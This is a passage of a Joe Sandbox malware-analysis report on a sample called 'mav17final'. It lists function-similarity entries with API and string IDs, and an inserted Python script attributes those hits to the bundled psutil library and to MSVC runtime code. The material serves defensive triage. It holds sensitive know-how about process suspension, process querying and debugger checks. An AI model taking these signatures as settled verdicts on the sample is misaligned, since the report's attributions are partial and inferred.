                                                  • Instruction Fuzzy Hash: C1814D72A0DAC281EE658F29A88427A7BA0FF95BF0F444135DB5E42794DF3CE446C700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: inet_ntop$AdaptersAddressesConvertIpv4LengthMaskswprintf_s
                                                  • String ID: %.2X$%.2X-$(OiOOOO)
                                                  • API String ID: 804476567-528653562
                                                  • Opcode ID: c0a452c1174e2cf7d6e79eb3bc4e276580985fca42ce442fcb64fc7de046b566
                                                  • Instruction ID: 68e51c6a69104949518a9024a3731238c4cde80f78963ce025a9addc138b8f1c
                                                  • Opcode Fuzzy Hash: c0a452c1174e2cf7d6e79eb3bc4e276580985fca42ce442fcb64fc7de046b566
                                                  • Instruction Fuzzy Hash: EFC17C32A09BC681EE649F2AA84867A7BA0FFA5BE4F444035CB4E47754DF3CE446C701
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleLastOpenResumeSuspend
                                                  • String ID: NtSuspend|ResumeProcess$OpenProcess$automatically set for PID 0
                                                  • API String ID: 2719000058-3759402225
                                                  • Opcode ID: 3d5dde5fc1f47f0ed35c3e43225d5f904c9510dc86047000f49375528cba329b
                                                  • Instruction ID: 86dcb82753e5c383a3b87ae97f2a78d5aea3bdfba23317c4ba796bf4b89a7d30
                                                  • Opcode Fuzzy Hash: 3d5dde5fc1f47f0ed35c3e43225d5f904c9510dc86047000f49375528cba329b
                                                  • Instruction Fuzzy Hash: 39213221B0C58781EF549F2EE8841796BA2BFA87E0F544035DB1D47795DE2CE8878710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072911922.00007FF8B90C1000.00000020.00000001.01000000.0000000A.sdmp, Offset: 00007FF8B90C0000, based on PE: true
                                                  • Associated: 00000002.00000002.2072881040.00007FF8B90C0000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072963464.00007FF8B90CD000.00000002.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2072997412.00007FF8B90D1000.00000004.00000001.01000000.0000000A.sdmp
                                                  • Associated: 00000002.00000002.2073022810.00007FF8B90D2000.00000002.00000001.01000000.0000000A.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b90c0000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 313767242-0
                                                  • Opcode ID: a7a0b375acf53c908aaa84b1677749aa5f730714d3c2174efe7977e719f92665
                                                  • Instruction ID: b854335d4f62e62a4bd1b6f3fbc208c930ccfc3259429c83fe6f4483ad46b440
                                                  • Opcode Fuzzy Hash: a7a0b375acf53c908aaa84b1677749aa5f730714d3c2174efe7977e719f92665
                                                  • Instruction Fuzzy Hash: 02311A72609AC186EB609F68E8403ED7375FB84784F44443ADB4E47A95DF38D64ED710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 313767242-0
                                                  • Opcode ID: ea38b9b02c827df44fb5011cb61d735aee822b3a281d6ad786fd76dbeb1e9228
                                                  • Instruction ID: 02b414f1fb625d8bdb456605ff57d87b4f902fa9ea1dbba20c8de247fdb7e756
                                                  • Opcode Fuzzy Hash: ea38b9b02c827df44fb5011cb61d735aee822b3a281d6ad786fd76dbeb1e9228
                                                  • Instruction Fuzzy Hash: 91311872609BC18AEB609FA8E8407E97760FB857A5F44443ADB4E47B98EF3CD548C710
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073245464.00007FF8B9841000.00000020.00000001.01000000.00000009.sdmp, Offset: 00007FF8B9840000, based on PE: true
                                                  • Associated: 00000002.00000002.2073221006.00007FF8B9840000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073274420.00007FF8B9843000.00000002.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073310530.00007FF8B9845000.00000004.00000001.01000000.00000009.sdmp
                                                  • Associated: 00000002.00000002.2073339457.00007FF8B9846000.00000002.00000001.01000000.00000009.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9840000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandledmemset$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 313767242-0
                                                  • Opcode ID: 491c6c3a996b181e7d4f6ff731a66c8976c72585f48119a1a83f76a26148e78e
                                                  • Instruction ID: dcdca3f709bd2bb0817f8f0d859dab31ba611e8350f94001eccc7beff3af2209
                                                  • Opcode Fuzzy Hash: 491c6c3a996b181e7d4f6ff731a66c8976c72585f48119a1a83f76a26148e78e
                                                  • Instruction Fuzzy Hash: FD311E72709AC286EB609F68E8407ED7360FB94784F44453ADB4D47B98DF38D648C710
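Before weighing the behavioural signatures against these function hits, a practitioner will want to separate bundled library code from the sample's own logic. The `psutil/arch/windows/disk.c` and `psutil/arch/windows/cpu.c` paths, the `psutil-debug [%s:%d]> ` prefix, `psutil_pid_is_running -> 0` and the `Py_BuildValue`/`PyArg_ParseTuple` format strings (`(IILLKK)`, `(OO)`, `i|O`) identify the image at 00007FF8B9070000 as psutil's `_psutil_windows` C extension mapped into the analysed process, so the service enumeration, `OpenProcess`/`NtQueryInformationProcess`, `\\.\PhysicalDrive%d` and `NtSuspendProcess` calls listed for that image are psutil's, not hand-written miner logic. Likewise the three identical hits at 00007FF8B90C0000, 00007FF8B9F60000 and 00007FF8B9840000, whose abbreviated API ID reads as SetUnhandledExceptionFilter, UnhandledExceptionFilter, IsDebuggerPresent, memset, RtlCaptureContext, RtlLookupFunctionEntry, IsProcessorFeaturePresent and RtlVirtualUnwind, match the import set of the MSVC x64 CRT stack-cookie failure handler (`__report_gsfailure`) that every MSVC-built image carries; an `IsDebuggerPresent` reference from such a function is compiler boilerplate. The script below is an added example and is not part of the Joe Sandbox report, of psutil or of the sample; it takes per-function records in the shape of these entries and lifts the attribution to module level. The API name lists in `SAMPLE_RECORDS` are assumptions expanded from the report's abbreviated API IDs; the strings are copied from the String ID lines above.

```python
"""Attribute Joe Sandbox IDA-plugin 'Similarity' hits to library code.

Each record is (snapshot file, API names, 'String ID' line) as the report
lists them. Functions are classified one by one, then the verdict is lifted
to the mapped image so that a function without tell-tale strings inherits
the attribution of its neighbours in the same module.
"""
import re
from collections import defaultdict
from dataclasses import dataclass, field

# Debug/error strings written by psutil's _psutil_windows C extension; every
# fragment here is visible in the report entries above.
PSUTIL_MARKERS = (
    "psutil/arch/windows/",
    "psutil-debug [",
    "psutil_pid_is_running",
    "automatically set for PID 0",
    "forced for PID 0",
    "(originated from %s)",
)

# Py_BuildValue / PyArg_ParseTuple format strings such as "(IILLKK)", "(OO)"
# or "i|O": corroborate a CPython extension but do not name the library, and
# short plain words can match by accident, so they are never decisive.
PY_FORMAT = re.compile(r"^\(?[sbhiIlLkKnOdfDcC|]{2,}\)?$")

# Import set of the MSVC x64 CRT stack-cookie failure handler
# (__report_gsfailure). Every MSVC-built image carries it, so an
# IsDebuggerPresent reference from such a function is compiler boilerplate.
CRT_GS_FAILURE = frozenset({
    "SetUnhandledExceptionFilter", "UnhandledExceptionFilter",
    "IsDebuggerPresent", "RtlCaptureContext", "RtlLookupFunctionEntry",
    "RtlVirtualUnwind", "IsProcessorFeaturePresent",
})


@dataclass
class Verdict:
    label: str                 # "psutil", "crt-gs-failure" or "unattributed"
    source_file: str = ""      # psutil/arch/windows/<file>.c when a string names it
    evidence: list = field(default_factory=list)


def split_string_id(string_id: str) -> list:
    """Split a 'String ID' line on the '$' separators the report uses."""
    return [s for s in string_id.split("$") if s.strip()]


def classify_function(apis, string_id: str) -> Verdict:
    """Classify one function from its API names and its 'String ID' line."""
    names = {a.split(".")[0] for a in apis}  # "OpenProcess.KERNEL32" -> "OpenProcess"
    if CRT_GS_FAILURE <= names:
        return Verdict("crt-gs-failure", evidence=["import set matches __report_gsfailure"])
    verdict = Verdict("unattributed")
    for s in split_string_id(string_id):
        marker = next((m for m in PSUTIL_MARKERS if m in s), None)
        if marker:
            verdict.label = "psutil"
            verdict.evidence.append(f"psutil marker {marker!r}")
            src = re.search(r"psutil/arch/windows/\w+\.c", s)
            if src:
                verdict.source_file = src.group(0)
        elif PY_FORMAT.match(s):
            verdict.evidence.append(f"CPython format string {s!r}")
    return verdict


def attribute_modules(records) -> dict:
    """Group records by snapshot file and lift function verdicts to the module.

    Returns {snapshot: {"label": str, "functions": [Verdict, ...]}}: a module
    is "psutil" if any of its functions is, "crt-only" if the GS handler is
    the only thing seen in it, otherwise "unattributed".
    """
    per_module = defaultdict(list)
    for snapshot, apis, string_id in records:
        per_module[snapshot].append(classify_function(apis, string_id))
    result = {}
    for snapshot, verdicts in per_module.items():
        if any(v.label == "psutil" for v in verdicts):
            label = "psutil"
            for v in verdicts:  # functions without markers inherit the module verdict
                if v.label == "unattributed":
                    v.label = "psutil"
                    v.evidence.append("inherited from module")
        elif all(v.label == "crt-gs-failure" for v in verdicts):
            label = "crt-only"
        else:
            label = "unattributed"
        result[snapshot] = {"label": label, "functions": verdicts}
    return result


# Constructed sample mirroring four entries from the report. API name lists
# are assumptions expanded from the abbreviated "API ID" lines; the strings
# are copied from the "String ID" lines.
PSUTIL_SNAPSHOT = "hcaresult_2_2_7ff8b9070000_mav17final.jbxd"
CRT_SNAPSHOT = "hcaresult_2_2_7ff8b90c0000_mav17final.jbxd"
SAMPLE_RECORDS = [
    (PSUTIL_SNAPSHOT, ["HeapAlloc", "HeapFree", "NtQuerySystemInformation", "CloseHandle"],
     "NtQuerySystemInformation$SystemExtendedHandleInformation buffer too big"),
    (PSUTIL_SNAPSHOT, ["fprintf", "GetLastError", "CloseHandle", "DeviceIoControl",
                       "swprintf_s", "CreateFileW"],
     "$(IILLKK)$DeviceIoControl -> ERROR_INVALID_FUNCTION; ignore PhysicalDrive%i"
     "$\\\\.\\PhysicalDrive%d$psutil-debug [%s:%d]> $psutil/arch/windows/disk.c"),
    (PSUTIL_SNAPSHOT, ["OpenSCManagerW", "EnumServicesStatusExW", "CloseServiceHandle"],
     "(OO)$(originated from %s)$OpenSCManager"),
    (CRT_SNAPSHOT, sorted(CRT_GS_FAILURE) + ["memset"], ""),
]

if __name__ == "__main__":
    for snapshot, info in attribute_modules(SAMPLE_RECORDS).items():
        print(snapshot, "->", info["label"])
        for v in info["functions"]:
            print("   ", v.label, v.source_file or "-", "; ".join(v.evidence))
```

Running it labels the whole 7ff8b9070000 image as psutil, including the `SystemExtendedHandleInformation` function that carries no psutil-specific string on its own, and reports the 7ff8b90c0000 image as CRT-only, which is exactly the distinction needed before crediting the sample with service enumeration or debugger checks of its own. The same lifting step is what keeps a true positive visible: a function in an unattributed image that calls `OpenSCManager` still stands on its own.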
                                                  APIs
                                                    • Part of subcall function 00007FF8B90781C0: OpenProcess.KERNEL32(?,?,?,00007FF8B9071966), ref: 00007FF8B90781DA
                                                    • Part of subcall function 00007FF8B90781C0: GetLastError.KERNEL32(?,?,?,00007FF8B9071966), ref: 00007FF8B90781E8
                                                    • Part of subcall function 00007FF8B90781C0: CloseHandle.KERNEL32(?,?,?,00007FF8B9071966), ref: 00007FF8B907820B
                                                  • CommandLineToArgvW.SHELL32 ref: 00007FF8B9072144
                                                  • GetLastError.KERNEL32 ref: 00007FF8B9072152
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLast$ArgvCloseCommandHandleLineOpenProcess
                                                  • String ID: (originated from %s)$CommandLineToArgvW$i|O$psutil_pid_is_running -> 0
                                                  • API String ID: 2690751061-2335919432
                                                  • Opcode ID: deac87614d14d2cd7fcede053ea73ff55bdac4ec2ebd44c97669a55f081cdf00
                                                  • Instruction ID: c5494dee04d0dfcc8109aa490335e024c21a24b4be26d969f6af82713798fb29
                                                  • Opcode Fuzzy Hash: deac87614d14d2cd7fcede053ea73ff55bdac4ec2ebd44c97669a55f081cdf00
                                                  • Instruction Fuzzy Hash: 12513065A0DAC281EE609F29E8443BA67A4FFA4BE4F440135DB9E436A5DF3CE4468710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleInformationLastOpenQuery
                                                  • String ID: NtQueryInformationProcess$OpenProcess$automatically set for PID 0
                                                  • API String ID: 241081717-1336995763
                                                  • Opcode ID: fff3764ab0624a0679a94573e97877e1ec39213333331769b47d7f519c66ef76
                                                  • Instruction ID: 641d0e2444501ac5e0ce0a16dd1c09a90d9d7e4490dfc546fb8b23eee9d0b2b3
                                                  • Opcode Fuzzy Hash: fff3764ab0624a0679a94573e97877e1ec39213333331769b47d7f519c66ef76
                                                  • Instruction Fuzzy Hash: 3C216061B0C6C382FF509F29F8802B96BA1BFA47E4F584035DB0D876A5DE6CE4468740
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Process$CloseErrorHandleInformationLastOpen
                                                  • String ID: NtSetInformationProcess$OpenProcess$automatically set for PID 0
                                                  • API String ID: 1640454886-2953277767
                                                  • Opcode ID: d920bf36b67fe67c9ea594868500f7548756d307c4f36ca9bf250ace23d20d22
                                                  • Instruction ID: 4f2139c5f59f0b99cafc210c623abbf2e7ae7fb5bc70f67ecb7417e0026e0b29
                                                  • Opcode Fuzzy Hash: d920bf36b67fe67c9ea594868500f7548756d307c4f36ca9bf250ace23d20d22
                                                  • Instruction Fuzzy Hash: 3C217121B1C68782FE549F2DF8805B92BA1AFA8BE0F448035DB1D477A5DE2CE4878700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ErrorLastswprintf_s
                                                  • String ID: %u.%u.%u.%u$OOd$WTSEnumerateSessionsW$WTSQuerySessionInformationW
                                                  • API String ID: 1644374431-281470548
                                                  • Opcode ID: 351cb9ce14cdabf345c66a283de42749b0387cef55aa96c4d2e12f7dfe231774
                                                  • Instruction ID: ae3a2f958a9d08d5f69ebbe5b1613a00f206bb29e5baed8852df6757f397f698
                                                  • Opcode Fuzzy Hash: 351cb9ce14cdabf345c66a283de42749b0387cef55aa96c4d2e12f7dfe231774
                                                  • Instruction Fuzzy Hash: 9FC12832B09A82C6FF658F69A8542BD3BA1AF64BE4F044135CF5E52A94DF3CE446C300
                                                  APIs
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: ExceptionFilterPresentUnhandled$CaptureContextDebuggerEntryFeatureFunctionLookupProcessorUnwindVirtual
                                                  • String ID:
                                                  • API String ID: 3140674995-0
                                                  • Opcode ID: 4d451b1ebd3bd04a7980592fc1aa2c80c17f49c06b6c165df2ba8b78148fda11
                                                  • Instruction ID: f241a1fb76d664808ac077d5358bb4d4e89cda9b8420c40ca779451049ba9dd2
                                                  • Opcode Fuzzy Hash: 4d451b1ebd3bd04a7980592fc1aa2c80c17f49c06b6c165df2ba8b78148fda11
                                                  • Instruction Fuzzy Hash: B9316C72609AC186EF608F64E8403EE3760FB94794F44403ADB4E47A94EF3CC64AC710
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Service$CloseHandleStart
                                                  • String ID: StartService
                                                  • API String ID: 402030760-99420325
                                                  • Opcode ID: 2ffd32a0515497b06187faa6b065d56fefb2bb7c14a36f5e79439c80651379cc
                                                  • Instruction ID: 3adf2a51a8424c42382fdaf1e80532bbb70b2c31f50425a25245338c81b68afb
                                                  • Opcode Fuzzy Hash: 2ffd32a0515497b06187faa6b065d56fefb2bb7c14a36f5e79439c80651379cc
                                                  • Instruction Fuzzy Hash: 86017120B0968381EE15AF2AEC942B967E1BFA9BD4F880031CB4D43754EE3CE5478700
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2072526967.00007FF8B9071000.00000020.00000001.01000000.0000000C.sdmp, Offset: 00007FF8B9070000, based on PE: true
                                                  • Associated: 00000002.00000002.2072498028.00007FF8B9070000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072578581.00007FF8B907B000.00000002.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072610762.00007FF8B9081000.00000004.00000001.01000000.0000000C.sdmp
                                                  • Associated: 00000002.00000002.2072642427.00007FF8B9082000.00000002.00000001.01000000.0000000C.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9070000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: DiskFreeSpace
                                                  • String ID: (LL)
                                                  • API String ID: 1705453755-591180812
                                                  • Opcode ID: 25a55e9020650d3683c57d1660a1f10089e65ec50ba526113029ab9d531df5ab
                                                  • Instruction ID: b4c34cfc7f40ff58454d7b8a7b2540f7ed284569cfd0be3dbb1357d36da9c692
                                                  • Opcode Fuzzy Hash: 25a55e9020650d3683c57d1660a1f10089e65ec50ba526113029ab9d531df5ab
                                                  • Instruction Fuzzy Hash: 59011665A08AC6C2DF109F65F8441AAAB70FF947E4F841036DB4D43A28DF7CD54ACB00
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Dealloc$Module_Object$From$Long_$Long$Void$StringUnicode_
                                                  • String ID: 1.1.0$ArgumentError$COMError$CTYPES_MAX_ARGCOUNT$FUNCFLAG_CDECL$FUNCFLAG_HRESULT$FUNCFLAG_PYTHONAPI$FUNCFLAG_STDCALL$FUNCFLAG_USE_ERRNO$FUNCFLAG_USE_LASTERROR$RTLD_GLOBAL$RTLD_LOCAL$__version__$_cast_addr$_memmove_addr$_memset_addr$_pointer_type_cache$_string_at_addr$_wstring_at_addr
                                                  • API String ID: 2895207140-772522829
                                                  • Opcode ID: b7dbbcc8b36d8762ecc7955ef4353bb7629bcf7eedf864b22fa349bc15453bc1
                                                  • Instruction ID: 4ec3a03f503e6f4c52e5320dc757a82d597c9a1763a5179b8175a5b5ef12f506
                                                  • Opcode Fuzzy Hash: b7dbbcc8b36d8762ecc7955ef4353bb7629bcf7eedf864b22fa349bc15453bc1
                                                  • Instruction Fuzzy Hash: 9BE1CA65A0AFC385FE498F69D9642782764AF4AFF6F086135CF0E56795EE2CE044C201
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073581981.00007FF8BA241000.00000020.00000001.01000000.00000005.sdmp, Offset: 00007FF8BA240000, based on PE: true
                                                  • Associated: 00000002.00000002.2073546754.00007FF8BA240000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073621002.00007FF8BA251000.00000002.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073653780.00007FF8BA256000.00000004.00000001.01000000.00000005.sdmp
                                                  • Associated: 00000002.00000002.2073688952.00007FF8BA257000.00000002.00000001.01000000.00000005.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8ba240000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Name::operator+
                                                  • String ID: volatile$<unknown>$UNKNOWN$__int128$__int16$__int32$__int64$__int8$__w64 $auto$bool$char$char16_t$char32_t$char8_t$const$decltype(auto)$double$float$int$long$long $short$signed $this $unsigned $void$volatile$wchar_t
                                                  • API String ID: 2943138195-1482988683
                                                  • Opcode ID: 36e6e2d055789cd29251c4bf9697f6c8a4377c58ea8e1572b96a4f003d2d3a05
                                                  • Instruction ID: d9356da33a55440f9048a8c23a8d01f1c882bed38599632adb2e5f5a46a6887a
                                                  • Opcode Fuzzy Hash: 36e6e2d055789cd29251c4bf9697f6c8a4377c58ea8e1572b96a4f003d2d3a05
                                                  • Instruction Fuzzy Hash: CE024A72E1861388FB24CB6CD8951BC2BB0BB05BC4F5451BADF0D16AA8DF2DE544E350
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
                                                  • Snapshot File: hcaresult_2_2_7ff8b9f60000_mav17final.jbxd
                                                  Similarity
                                                  • API ID: Err_$Dealloc$Arg_FormatParseSizeStringTuple_$Eval_Thread$AddressAttrAuditLong_Object_OccurredProcRestoreSaveSequence_Sys_TupleVoid
                                                  • String ID: O&O;illegal func_spec argument$O|O$_handle$abstract class$could not convert the _handle attribute to a pointer$ctypes.dlsym$function '%s' not found$function ordinal %d not found$i|OO$paramflag value %d not supported$paramflags must be a sequence of (int [,string [,value]]) tuples$paramflags must be a tuple or None$paramflags must have the same length as argtypes$the _handle attribute of the second argument must be an integer
                                                  • API String ID: 1081342661-1557499450
                                                  • Opcode ID: 81bf86f915efca78798dbd81cfc19dde70ba7face78de59bde1888ce70c5e139
                                                  • Instruction ID: 36d09bc0d685742ffa6e45c4981265866e15ceb953f4f7df7133d95cbb6a0ad4
                                                  • Opcode Fuzzy Hash: 81bf86f915efca78798dbd81cfc19dde70ba7face78de59bde1888ce70c5e139
                                                  • Instruction Fuzzy Hash: CFC11922B09B8285EB548FADD8541B927B4BF46BEAF586036DB0E577A4DF3CE445C300
                                                  APIs
                                                  Strings
                                                  Memory Dump Source
                                                  • Source File: 00000002.00000002.2073399424.00007FF8B9F61000.00000020.00000001.01000000.00000006.sdmp, Offset: 00007FF8B9F60000, based on PE: true
                                                  • Associated: 00000002.00000002.2073369896.00007FF8B9F60000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073427711.00007FF8B9F70000.00000002.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073461969.00007FF8B9F77000.00000004.00000001.01000000.00000006.sdmp
                                                  • Associated: 00000002.00000002.2073519452.00007FF8B9F7B000.00000002.00000001.01000000.00000006.sdmp
                                                  Joe Sandbox IDA Plugin
